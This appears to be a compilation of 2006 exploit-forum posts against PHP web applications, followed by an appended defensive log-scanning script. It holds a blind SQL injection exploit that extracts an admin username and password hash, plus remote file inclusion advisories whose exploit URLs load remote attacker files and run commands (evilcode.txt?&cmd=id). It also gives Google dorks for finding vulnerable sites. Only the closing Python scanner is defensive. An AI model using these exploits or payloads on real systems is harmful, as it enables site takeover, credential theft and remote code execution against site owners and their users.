{
  for ($i=0; $i<=255; $i++)
  {
    $sql="(SELECT(IF((ASCII(SUBSTRING(uname,$j,1))=".$i."),msg_time,subject)) FROM/**/".$prefix."users/**/WHERE/**/rank=7/**/and/**/level=5)/**/ASC/**/ LIMIT/**/1/*";
    echo "sql -> ".$sql."\r\n";
    $sql=urlencode($sql);
    $packet ="GET ".$p."modules/messages/index.php?sort=$sql&by=suntzu HTTP/1.0\r\n";
    $packet.="Accept-Encoding: text/plain\r\n";
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Cookie: ".$cookie."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);
    if (!strstr($html,"111111111111111111111111")){$my_admin.=chr($i);echo "admin -> ".$my_admin."[???]\n";sleep(1);break;}
    if ($i==255) {die("Exploit failed ");}
  }
  $j++;
}
echo " -\n";
echo "admin -> ".$my_admin."\n";
echo "password (md5) -> ".$my_password."\n";
echo " -\n";
function is_hash($hash)
{
  if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
  else {return false;}
}
if (is_hash($my_password)) {echo "Exploit succeeded ";}
else {echo "Exploit failed ";}
?>
black_hat_cr(HCE)
Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability
Code:
####################################################################################
#JD-Wiki Remote File Include
-
JD-Wiki is the Joomla! integration of the nice DokuWiki
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating documentation of any kind
-
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote attacker to execute commands via rfi
path: ?mosConfig_absolute_path=
xpl:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell
Contact: irc.undernet.org #hackbsd & #ircmasters
# milw0rm.com [2006-08-07]
vns3curity(HCE)
Joomla MamboWiki Component <= 0.9.4 Remote File Inclusion Vulnerability
Search for sites affected by this bug with Google:
Code:
inurl:"com_mambowiki"
Affected file: MamboLogin.php
Xploit:
Code:
http://[sitepath]/[joomlapath]/components/com_mambowiki/MamboLogin.php?IP= http://huh?
black_hat_cr(HCE)
k_shoutBox <= 4.4 Remote File Inclusion Vulnerability
Code:
>>> Kurdish Security
>>> ShoutBox Remote Command Execution
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Risk : High
>>> Class : Remote
>>> Script : ShoutBox
>>> Site : http://www.knusperleicht.at
Code :
//**********************************************************
// INCLUDE PATH
define('SB_INCLUDE_PATH', $sb_include_path);
// INCLUDE PATH
//**********************************************************
include SB_INCLUDE_PATH.'inc/config.inc.php';
require_once SB_INCLUDE_PATH.'lang/'.SB_LANGUAGE.'/'.SB_LANGUAGE.'.lang.inc.php';
require_once SB_INCLUDE_PATH.'inc/Sb_template.php';
require_once SB_INCLUDE_PATH.'inc/Sb_bbcode.php';
require_once SB_INCLUDE_PATH.'inc/Sb_stuff.php';
require_once SB_INCLUDE_PATH.'inc/Sb_database.php';
if(SB_INCLUDE_PATH == "") {
http://www.site.com/[path]/sb/index.php?sb_include_path=http://[site]/evilcode.txt?&cmd=id
# milw0rm.com [2006-08-01]
vns3curity(HCE)
Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability
Code:
Script: Kayako eSupport <= 2.3.1
Vendor: Kayako (www.kayako.com)
Discovered: beford <xbefordx gmail com>
Comments: It seems like the vendor silently fixed the issue in the
current version (more like since v2.3.5) without warning users of
previous versions, noobs
Requires that "register_globals" is enabled
Vulnerable File: esupport/admin/autoclose.php
Code:
require_once $subd . "functions.php";
Not-leet-enough: "Powered By Kayako eSupport"
http://www.google.com/search?q=%22He port+v2.3.1%22
http://www.google.com/search?q=%22He upport+v2.2%22
POC: http://omghax.com/esupport/admin/aut //remotefile/?
# milw0rm.com [2006-08-02]
vns3curity(HCE)
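For defenders reviewing web server logs: the remote file inclusion advisories above (JD-Wiki, MamboWiki, k_shoutBox, Kayako eSupport) share one request shape, an include-path parameter whose value is a remote URL. The following is an added example, not part of the original posts; the log lines, hosts and function names are constructed for illustration, and the `next` parameter is a hypothetical benign case.

```python
import re
from urllib.parse import parse_qsl, unquote

# Parameter names taken from the advisories on this page (PHP names are case-sensitive).
KNOWN_PARAMS = {"mosConfig_absolute_path", "IP", "sb_include_path", "subd"}
REMOTE_URL = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges, example.test hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Aug/2006:10:00:01 +0000] "GET /components/com_jd-wiki/lib/tpl/default/'
    'main.php?mosConfig_absolute_path=http://files.example.test/a.txt HTTP/1.0" 200 512',
    '203.0.113.7 - - [07/Aug/2006:10:00:02 +0000] "GET /sb/index.php?'
    'sb_include_path=http://files.example.test/x.txt?&cmd=id HTTP/1.0" 200 90',
    '203.0.113.9 - - [07/Aug/2006:10:00:03 +0000] "GET /esupport/admin/autoclose.php?'
    'subd=http%253A%252F%252Ffiles.example.test%252F HTTP/1.1" 200 0',
    '198.51.100.4 - - [07/Aug/2006:10:00:04 +0000] "GET /components/com_mambowiki/'
    'MamboLogin.php?IP=198.51.100.4 HTTP/1.1" 200 733',
    '198.51.100.4 - - [07/Aug/2006:10:00:05 +0000] "GET /index.php?'
    'next=https://www.example.test/home HTTP/1.1" 302 0',
]

def decode_fully(value, rounds=2):
    """Undo extra layers of percent-encoding left after parse_qsl's single decode."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_findings(log_line):
    """Return [(param, value, known)] for query parameters whose value is a remote URL."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw)
        if REMOTE_URL.match(value):
            # known=True: parameter named in an advisory; False: review (may be a redirect)
            findings.append((name, value, name in KNOWN_PARAMS))
    return findings

def scan(lines):
    """Return (line_number, param, value, known) for every finding in `lines`."""
    return [(n, *f) for n, line in enumerate(lines, 1) for f in rfi_findings(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits with `known=False` are ordinary URL-valued parameters such as redirects and need triage rather than an alert.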